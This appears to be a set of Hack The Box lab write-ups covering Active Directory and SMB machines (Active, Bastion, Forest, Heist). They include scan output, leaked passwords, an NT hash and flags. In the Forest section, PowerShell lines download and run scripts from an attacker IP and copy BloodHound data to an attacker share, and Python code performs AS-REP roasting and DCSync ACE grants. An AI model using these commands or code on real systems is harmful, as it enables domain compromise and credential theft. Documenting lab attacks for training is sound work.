Nmap scan report for 10.10.10.100
Host is up (0.59s latency).
Not shown: 982 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-07-04 09:21:59Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.10.100
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
------
 ======================================
|    OS information on 10.10.10.100    |
 ======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 458.
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.10.100 from smbclient:
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 467.
[+] Got OS info for 10.10.10.100 from srvinfo:
	10.10.10.100   Wk Sv PDC Tim NT     Domain Controller
	platform_id     :	500
	os version      :	6.1
	server type     :	0x80102b
------
 =========================================
|    Share Enumeration on 10.10.10.100    |
 =========================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 640.

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	attacker_folder Disk
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Replication     Disk
	SYSVOL          Disk      Logon server share
	Users           Disk
The share list came back over a null session, so anonymous (guest) access should work; smbmap shows which shares it actually grants.
smbmap -H 10.10.10.100
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        attacker_folder                                         NO ACCESS
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share
        Users                                                   NO ACCESS
Only Replication is readable. Download the whole folder (the smbclient commands below are typed at its interactive prompt):
smbclient //10.10.10.100/Replication
mask ""
recurse ON
prompt OFF
mget active.htb
type \users\administrator\desktop\root.txt
b5fc76d1d6b91d77b2fbf2d54d0f708b
Bastion
Port scan
nmap -sV -sT -Pn 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.59s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Exploitation
Enumerate the shares with smbmap (any username works here; "test" is an arbitrary guest login):
smbmap -H 10.10.10.134 -u test

        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Backups                                                 READ, WRITE
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
dir WindowsImageBackup\L4mpje-PC\"Backup 2019-02-22 124351"\
  .                                                                                    Dn          0  Fri Feb 22 20:45:32 2019
  ..                                                                                   Dn          0  Fri Feb 22 20:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd                                             An   37761024  Fri Feb 22 20:44:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd                                             An 5418299392  Fri Feb 22 20:45:32 2019
  BackupSpecs.xml                                                                      An       1186  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml   An       1078  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml                                  An       8930  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml                            An       6542  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml  An       2894  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml  An       1488  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml  An       1484  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml  An       3844  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml  An       3988  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml  An       7110  Fri Feb 22 20:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml  An    2374620  Fri Feb 22 20:45:32 2019

                7735807 blocks of size 4096. 2757267 blocks available

The Backups share holds a Windows image backup of L4mpje-PC with two VHDs. The second one is about 5.4 GB (5418299392 bytes), so it is better mounted over the share than pulled down in full.
ssh administrator@10.10.10.134
thXLHM96BeKL0ER2
type \Users\Administrator\Desktop\root.txt
958850b91811676ed6620a9c430e65c8
Forest
Port scan
nmap -sV -sT -Pn 10.10.10.161
Nmap scan report for 10.10.10.161
Host is up (0.081s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       Microsoft DNS
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-05 14:34:46Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
 ===========================================
|    Getting domain SID for 10.10.10.161    |
 ===========================================
Domain Name: HTB
Domain Sid: S-1-5-21-3072663084-364016917-1341370565
[+] Host is part of a domain (not a workgroup)
Requesting a TGT for a domain account normally means authenticating to the KDC first (Kerberos pre-authentication), which requires that account's credentials. An account can instead have the property "Do not require Kerberos preauthentication" (UF_DONT_REQUIRE_PREAUTH) set. AS-REP Roasting is an attack against Kerberos for these accounts: anyone who can reach the KDC can request an AS-REP for such a user without knowing its password, and because the encrypted part of that reply is keyed from the user's password, the password can be guessed offline against the captured reply.
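The offline half of that attack, as an added example that is not part of the original writeup. It implements the RC4-HMAC (etype 23) encryption the KDC applies to the AS-REP enc-part (RFC 4757, with MD4 written out because hashlib often lacks it), emits the `$krb5asrep$23$...` line that impacket's GetNPUsers.py and hashcat mode 18200 use, and cracks it from a small wordlist. The account name svc-alfresco and the password s3rvice are the ones that appear later on this page; the confounder, the placeholder enc-part body and the wordlist are constructed for the example, not a real KDC reply.

```python
"""AS-REP roasting end to end: why a 'no preauth' account's password can be guessed offline."""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib.new('md4') is often disabled under OpenSSL 3."""
    rot = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (function, additive constant, word order, per-step rotations)
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        v = state[:]
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                j = (-i) % 4  # register updated this step cycles a, d, c, b
                a, b, c, d = v[j], v[(j + 1) % 4], v[(j + 2) % 4], v[(j + 3) % 4]
                v[j] = rot((a + fn(b, c, d) + words[k] + const) & MASK32, shifts[i % 4])
        state = [(s + t) & MASK32 for s, t in zip(state, v)]
    return struct.pack("<4I", *state)


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC long-term key is the NT hash: unsalted MD4 over the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


# RFC 4757: the AS-REP enc-part is key usage 3, but RC4-HMAC encodes it as 8 in the usage string.
ASREP_USAGE = struct.pack("<I", 8)


def rc4_hmac_encrypt(key: bytes, confounder: bytes, plaintext: bytes) -> bytes:
    """What the KDC does to the enc-part: output = 16-byte HMAC-MD5 checksum + RC4 ciphertext."""
    k1 = _hmac_md5(key, ASREP_USAGE)
    checksum = _hmac_md5(k1, confounder + plaintext)
    return checksum + rc4(_hmac_md5(k1, checksum), confounder + plaintext)


def rc4_hmac_decrypt(key: bytes, edata: bytes):
    """Return the decrypted enc-part, or None when the checksum says the key is wrong."""
    checksum, ctext = edata[:16], edata[16:]
    k1 = _hmac_md5(key, ASREP_USAGE)
    ptext = rc4(_hmac_md5(k1, checksum), ctext)
    if not hmac.compare_digest(_hmac_md5(k1, ptext), checksum):
        return None
    return ptext[8:]  # drop the 8-byte confounder


def asrep_hash_line(user: str, realm: str, edata: bytes) -> str:
    """hashcat -m 18200 layout: $krb5asrep$23$user@REALM:checksum$ciphertext."""
    return "$krb5asrep$23$%s@%s:%s$%s" % (user, realm, edata[:16].hex(), edata[16:].hex())


def crack_asrep(line: str, wordlist):
    """Offline guess loop: derive a key from each candidate and test it against the checksum."""
    _, rest = line.split(":", 1)
    checksum_hex, ctext_hex = rest.split("$", 1)
    edata = bytes.fromhex(checksum_hex) + bytes.fromhex(ctext_hex)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), edata) is not None:
            return candidate
    return None


def sample_asrep_line() -> str:
    """Constructed AS-REP for svc-alfresco under the password seen later on this page."""
    confounder = bytes(range(8))  # fixed so the sample is reproducible; a real KDC uses random bytes
    enc_part = b"\x79" + b"constructed stand-in for the DER EncASRepPart (tag 0x79)"
    return asrep_hash_line("svc-alfresco", "HTB.LOCAL", rc4_hmac_encrypt(nt_hash("s3rvice"), confounder, enc_part))


if __name__ == "__main__":
    line = sample_asrep_line()
    print(line)
    print("cracked:", crack_asrep(line, ["password", "Welcome1", "Summer2021", "s3rvice"]))
```

The cost of each guess is one MD4 and three HMAC-MD5 calls, which is why a no-preauth account with a dictionary password falls quickly; the fix is to clear the flag, or at least to give such accounts long random passwords and to alert on 4768 events with pre-authentication type 0.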
iex(new-object net.webclient).downloadstring("http://10.10.16.11:9998/PowerView.ps1")
iex(new-object net.webclient).downloadstring("http://10.10.16.11:9998/SharpHound.ps1")
powershell -exec bypass
invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice
net use \\10.10.16.11\Bufferfly /u:Buffer fly
copy 20210705223815_BloodHound.zip \\10.10.16.11\Bufferfly\
net use /d \\10.10.16.11\Bufferfly
I honestly could not make sense of the BloodHound output, so I read a writeup.
The general idea is:
The user "svc-alfresco" has Account Operators rights and can create domain accounts.
The user "svc-alfresco" has full control (GenericAll) over the "Exchange Windows Permissions" group, so "svc-alfresco" can be added to "Exchange Windows Permissions".
The "Exchange Windows Permissions" group can modify the ACL of the domain object (WriteDacl).
Using the WriteDacl held through "Exchange Windows Permissions", "svc-alfresco" grants DCSync rights to a domain account.
Use that domain account to run a DCSync attack.
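What the WriteDacl step actually writes, as an added example that is not part of the original writeup. A "grant DCSync" is nothing more than new ACEs on the domain object's DACL: one ACCESS_ALLOWED_OBJECT_ACE per replication extended right (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, identified by their well-known GUIDs) for the trustee SID. The code builds those ACEs in the on-the-wire security-descriptor layout, appends them to a DACL, and then audits a DACL for principals holding both, which is the check a defender runs after an incident like this one. The starting DACL, the RID 1601 for the new account and all helper names are constructed for the example; PowerView's Add-DomainObjectAcl -Rights DCSync additionally writes DS-Replication-Get-Changes-In-Filtered-Set, which is left out here.

```python
"""Build and audit the ACEs that a 'grant DCSync' edit writes into the domain object's DACL."""
import struct
import uuid

# Control-access (extended) rights a plain DCSync needs on the domain naming context.
DS_REPLICATION_GET_CHANGES = uuid.UUID("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2")
DS_REPLICATION_GET_CHANGES_ALL = uuid.UUID("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")
DCSYNC_RIGHTS = frozenset({DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL})

ACCESS_ALLOWED_ACE_TYPE = 0x00
ACCESS_ALLOWED_OBJECT_ACE_TYPE = 0x05
INHERIT_ONLY_ACE = 0x08                # ACE applies to child objects only, not to this object
ACE_OBJECT_TYPE_PRESENT = 0x01
ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x02
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100    # mask bit: "the extended right named by ObjectType"
ACL_REVISION_DS = 0x04


def sid_to_bytes(sid: str) -> bytes:
    """'S-1-5-21-...-1121' -> revision, sub-authority count, 48-bit BE authority, 32-bit LE sub-authorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID: %r" % sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def bytes_to_sid(data: bytes) -> str:
    rev, count = struct.unpack_from("<BB", data, 0)
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))


def object_ace(sid: str, right: uuid.UUID) -> bytes:
    """ACCESS_ALLOWED_OBJECT_ACE granting one extended right (by GUID) to `sid`."""
    body = (struct.pack("<II", ADS_RIGHT_DS_CONTROL_ACCESS, ACE_OBJECT_TYPE_PRESENT)
            + right.bytes_le + sid_to_bytes(sid))
    return struct.pack("<BBH", ACCESS_ALLOWED_OBJECT_ACE_TYPE, 0, 4 + len(body)) + body


def build_dacl(aces: list) -> bytes:
    body = b"".join(aces)
    return struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(body), len(aces), 0) + body


def grant_dcsync(dacl: bytes, sid: str) -> bytes:
    """The WriteDacl abuse step: append one object ACE per replication right for `sid`."""
    rev, sbz1, size, count, sbz2 = struct.unpack_from("<BBHHH", dacl, 0)
    added = b"".join(object_ace(sid, r) for r in sorted(DCSYNC_RIGHTS, key=str))
    return struct.pack("<BBHHH", rev, sbz1, size + len(added), count + 2, sbz2) + dacl[8:size] + added


def replication_rights(dacl: bytes) -> dict:
    """Audit helper: map each trustee SID to the replication rights this DACL allows it directly."""
    _, _, _, count, _ = struct.unpack_from("<BBHHH", dacl, 0)
    found = {}
    off = 8
    for _ in range(count):
        ace_type, ace_flags, ace_size = struct.unpack_from("<BBH", dacl, off)
        end = off + ace_size
        if not ace_flags & INHERIT_ONLY_ACE:
            if ace_type == ACCESS_ALLOWED_ACE_TYPE:
                (mask,) = struct.unpack_from("<I", dacl, off + 4)
                if mask & ADS_RIGHT_DS_CONTROL_ACCESS:  # no GUID at all: every extended right
                    found.setdefault(bytes_to_sid(dacl[off + 8:end]), set()).update(DCSYNC_RIGHTS)
            elif ace_type == ACCESS_ALLOWED_OBJECT_ACE_TYPE:
                mask, flags = struct.unpack_from("<II", dacl, off + 4)
                p, obj_type = off + 12, None
                if flags & ACE_OBJECT_TYPE_PRESENT:
                    obj_type = uuid.UUID(bytes_le=bytes(dacl[p:p + 16]))
                    p += 16
                if flags & ACE_INHERITED_OBJECT_TYPE_PRESENT:
                    p += 16
                if mask & ADS_RIGHT_DS_CONTROL_ACCESS:
                    granted = DCSYNC_RIGHTS if obj_type is None else {obj_type} & DCSYNC_RIGHTS
                    if granted:
                        found.setdefault(bytes_to_sid(dacl[p:end]), set()).update(granted)
        off = end
    return found


def can_dcsync(dacl: bytes, sid: str) -> bool:
    """A plain DCSync needs both GetChanges and GetChangesAll on the domain object."""
    return replication_rights(dacl).get(sid, set()) >= DCSYNC_RIGHTS


def sample_domain_dacl() -> bytes:
    """Constructed DACL: only Enterprise Domain Controllers (S-1-5-9) hold GetChanges. A real one is far larger."""
    return build_dacl([object_ace("S-1-5-9", DS_REPLICATION_GET_CHANGES)])


# Hypothetical SID for the freshly created account; RID 1601 is made up for this example.
NEW_ACCOUNT_SID = "S-1-5-21-3072663084-364016917-1341370565-1601"

if __name__ == "__main__":
    before = sample_domain_dacl()
    after = grant_dcsync(before, NEW_ACCOUNT_SID)
    print("before:", can_dcsync(before, NEW_ACCOUNT_SID), "after:", can_dcsync(after, NEW_ACCOUNT_SID))
    print(replication_rights(after))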
Add a domain user
net user bufferfly bufferfly /add /domain
After running the command, get a new shell.
Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members svc-alfresco
Check group membership
whoami /groups
HTB\Exchange Windows Permissions   Group   S-1-5-21-3072663084-364016917-1341370565-1121   Mandatory group, Enabled by default, Enabled group
HTB\Exchange Trusted Subsystem     Group   S-1-5-21-3072663084-364016917-1341370565-1119   Mandatory group, Enabled by default, Enabled group
evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
type c:\users\administrator\desktop\root.txt
f048153f202bbb2f82622b04d79129cc
It seems svc-alfresco is not a domain user, and the DCSync operation needs a domain user's credentials.
PowerShell apparently loads the functions from the .ps1 files automatically when running commands, which is convenient.
Heist
Port scan
nmap -sV -sT -Pn 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.24s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows